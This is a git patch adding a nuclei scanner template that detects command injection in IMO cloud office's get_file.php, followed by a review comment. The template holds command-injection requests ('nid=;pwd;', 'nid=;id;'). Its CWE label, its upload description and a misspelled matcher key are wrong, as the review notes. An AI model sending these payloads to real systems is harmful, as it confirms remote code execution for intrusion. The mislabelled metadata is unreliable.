From b326be4e12e04527e0486fd4bdfb2d011ca13b87 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 9 Sep 2024 13:31:36 +0400
Subject: [PATCH] Create imo-rce.yaml

---
 http/vulnerabilities/imo-rce.yaml | 57 +++++++++++++++++++++++++++++++
 1 file changed, 57 insertions(+)
 create mode 100644 http/vulnerabilities/imo-rce.yaml

diff --git a/http/vulnerabilities/imo-rce.yaml b/http/vulnerabilities/imo-rce.yaml
new file mode 100644
index 0000000000..85f74754b4
--- /dev/null
+++ b/http/vulnerabilities/imo-rce.yaml
@@ -0,0 +1,57 @@
+id: imo-rce
+
+info:
+  name: IMO - Remote Code Execution
+  author: ritikchaddha
+  severity: critical
+  description: |
+    The lax filtering of imo cloud office/file/NDisk/get_file.php allows unlimited file uploads. Attackers can directly obtain website permissions through this vulnerability.
+  reference:
+    - https://www.henry4e36.top/index.php/archives/130.html#cl-1
+    - https://forum.butian.net/article/213
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-89
+  metadata:
+    max-request: 3
+  tags: imo,rce
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'imo'
+        case-insensitve: true
+        internal: true
+
+  - raw:
+      - |
+        GET /file/NDisk/get_file.php?cid=1&nid=;pwd; HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /file/NDisk/get_file.php?cid=1&nid=;id; HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body_1
+        regex:
+          - 'home/www/html/[^"]*/file/NDisk'
+
+      - type: regex
+        part: body_2
+        regex:
+          - "uid=[0-9]+.*gid=[0-9]+.*"
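Review bot: The classification line `cwe-id: CWE-89` labels this as SQL injection, but the requests inject shell commands through the `nid` parameter (`nid=;pwd;`, `nid=;id;`) and match on `uid=…gid=…` output, which is OS command injection, so it should read `cwe-id: CWE-78`; the description's "allows unlimited file uploads" likewise describes a different bug than the one the template exercises and should state that `get_file.php` passes `nid` to a shell. The fingerprint matcher's key `case-insensitve: true` is misspelled (`case-insensitive: true`), so depending on how nuclei treats unknown matcher keys the pre-check either fails to load or runs case-sensitive; the bare word `imo` is also a weak fingerprint that will match unrelated pages containing that substring, and a more specific product marker from the reference pages would reduce false positives. The `body_1` regex hard-codes the install path `home/www/html/`, which will miss deployments elsewhere even though the `id` output in `body_2` already proves execution — consider matching `/file/NDisk` alone or relying on `body_2` only.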